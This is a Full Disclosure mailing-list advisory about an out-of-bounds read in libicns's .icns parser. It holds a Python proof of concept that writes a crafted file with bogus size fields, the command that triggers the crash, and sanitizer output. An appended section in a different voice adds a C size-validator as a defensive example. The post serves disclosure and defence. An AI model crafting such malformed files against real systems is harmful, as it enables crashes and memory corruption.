Message-ID: <CAFmK-GyYqQKqNZv9CTsddAJkw82Tr5+8iwc3VfC8xStPhzP5wA@mail.gmail.com>
Date: Thu, 11 Sep 2025 03:19:08 -0400
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] libicns v0.8.1 Out-of-Bounds Read in libicns icns_family.c when parsing malformed .icns files

libicns fails to validate element size fields in .icns files properly. A
crafted file can cause the library to allocate insufficient memory for an
icns_family_t structure. When icns_family.c treats this undersized memory
as a complete struct, it dereferences members that lie beyond the allocated
space. This results in an Out-of-Bounds Read (CWE-125). Depending on
subsequent code paths, these invalid member references may also be written
to, escalating to an Out-of-Bounds Write (CWE-787).

*Impact:*

   - Out-of-Bounds Read → crash (Denial of Service).
   - If invalid struct members are later updated, this may cause
   Out-of-Bounds Write and heap corruption.
   - With controlled heap layouts, an attacker could leverage the writes
   for arbitrary code execution.

*Proof of Concept:*

Save as bad.icns:
---
import struct

data  = b'icns'                     # container magic
data += struct.pack('>I', 32)       # fake file size
data += b'ic07'                     # 128x128 ARGB type
data += struct.pack('>I', 16)       # bogus element size
data += b'\xff' * 8                 # filler

open('bad.icns','wb').write(data)
---

./icnsutil -c icns -o out.png bad.icns


*Output:*
icns_family.c:58:2: runtime error: member access within address
0x502000000030 with insufficient space for an object of type
'icns_family_t' (aka 'struct icns_family_t') 0x502000000030: note: pointer
points here 00 00 00 00 be be be be be be be be 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00
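As an added, defender-side example that is not libicns code and does not come from this post: a small validator for the .icns container layout (assumed here: a 4-byte "icns" magic, a 4-byte big-endian total size that includes that 8-byte header, then elements each carrying a 4-byte type and a 4-byte big-endian size that likewise includes its own 8-byte header) which checks every size field against the bytes actually present before anything is allocated or cast to a struct. The names icns_status, icns_validate, icns_family_alloc_size and icns_element_count are hypothetical. Fed the byte layout of the PoC above, it rejects the file at the header because the declared size (32) exceeds the 24 bytes supplied; the other constructed inputs exercise an element size smaller than its own header, one that runs past the end, and a consistent two-element file.

```c
/* Hypothetical .icns container validator (added example; not libicns code).
 * Assumed layout: 4-byte magic "icns", 4-byte big-endian total size that
 * includes this 8-byte header, then elements of 4-byte type + 4-byte
 * big-endian header-inclusive size + payload. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ICNS_HDR_LEN 8u

typedef enum {
    ICNS_OK = 0,
    ICNS_ERR_TRUNCATED,   /* fewer bytes than a header needs */
    ICNS_ERR_MAGIC,       /* not an icns container */
    ICNS_ERR_FILESIZE,    /* declared size disagrees with the bytes present */
    ICNS_ERR_ELEMSIZE     /* element size below its header or past the end */
} icns_status;

static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Walk the container and check every size field against the bytes actually
 * present. Nothing is allocated or cast to a struct until this returns ICNS_OK. */
icns_status icns_validate(const unsigned char *buf, size_t len, size_t *count)
{
    size_t off, n = 0;

    if (len < ICNS_HDR_LEN)            return ICNS_ERR_TRUNCATED;
    if (memcmp(buf, "icns", 4) != 0)   return ICNS_ERR_MAGIC;

    uint32_t file_size = be32(buf + 4);
    /* The PoC above declares 32 bytes but supplies 24: reject before trusting it. */
    if (file_size < ICNS_HDR_LEN || file_size > len) return ICNS_ERR_FILESIZE;

    off = ICNS_HDR_LEN;
    while (off < file_size) {
        if (file_size - off < ICNS_HDR_LEN) return ICNS_ERR_TRUNCATED;
        uint32_t elem_size = be32(buf + off + 4);
        /* Header-inclusive size: below 8 cannot hold its own header, above
         * what remains would be read past the buffer. */
        if (elem_size < ICNS_HDR_LEN || elem_size > file_size - off)
            return ICNS_ERR_ELEMSIZE;
        off += elem_size;   /* elem_size >= 8, so the loop always advances */
        n++;
    }
    if (count) *count = n;
    return ICNS_OK;
}

/* Bytes to allocate for an in-memory copy: the declared size, but only once
 * validation has proven it consistent. 0 means "do not allocate". */
size_t icns_family_alloc_size(const unsigned char *buf, size_t len)
{
    if (icns_validate(buf, len, NULL) != ICNS_OK) return 0;
    return be32(buf + 4);   /* >= ICNS_HDR_LEN and <= len, so a header struct fits */
}

/* Convenience: element count, or -1 when the container is rejected. */
long icns_element_count(const unsigned char *buf, size_t len)
{
    size_t n = 0;
    return icns_validate(buf, len, &n) == ICNS_OK ? (long)n : -1;
}

/* Constructed inputs. poc_icns reproduces the byte layout of the PoC in this post. */
static const unsigned char poc_icns[] = {
    'i','c','n','s', 0,0,0,32,  'i','c','0','7', 0,0,0,16,
    0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff };
/* Same element, but the declared file size now matches the 24 bytes present. */
static const unsigned char consistent_icns[] = {
    'i','c','n','s', 0,0,0,24,  'i','c','0','7', 0,0,0,16,
    0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff };
/* Two consistent elements, 40 bytes in total. */
static const unsigned char two_elem_icns[] = {
    'i','c','n','s', 0,0,0,40,
    'i','c','0','7', 0,0,0,16,  1,1,1,1,1,1,1,1,
    'i','c','0','8', 0,0,0,16,  2,2,2,2,2,2,2,2 };
/* Element size 4: smaller than its own header. */
static const unsigned char tiny_elem_icns[] = {
    'i','c','n','s', 0,0,0,24,  'i','c','0','7', 0,0,0,4,
    0,0,0,0,0,0,0,0 };
/* Element size 100: runs past the end of the declared container. */
static const unsigned char long_elem_icns[] = {
    'i','c','n','s', 0,0,0,24,  'i','c','0','7', 0,0,0,100,
    0,0,0,0,0,0,0,0 };

int main(void)
{
    static const char *names[] = { "OK", "truncated", "bad magic", "file size", "element size" };
    printf("PoC layout:       %s\n", names[icns_validate(poc_icns, sizeof poc_icns, NULL)]);
    printf("consistent file:  %s, %ld element(s)\n",
           names[icns_validate(consistent_icns, sizeof consistent_icns, NULL)],
           icns_element_count(consistent_icns, sizeof consistent_icns));
    printf("two elements:     %ld element(s)\n", icns_element_count(two_elem_icns, sizeof two_elem_icns));
    printf("element size 4:   %s\n", names[icns_validate(tiny_elem_icns, sizeof tiny_elem_icns, NULL)]);
    printf("element size 100: %s\n", names[icns_validate(long_elem_icns, sizeof long_elem_icns, NULL)]);
    return 0;
}
```

Build with a C99 compiler (for example `cc -std=c99 icns_check.c`). The point of the structure is ordering: the size fields are reconciled with the real buffer length first, and the allocation size is derived only from values that passed, so the undersized-struct condition the advisory describes cannot arise from a crafted size field.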
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/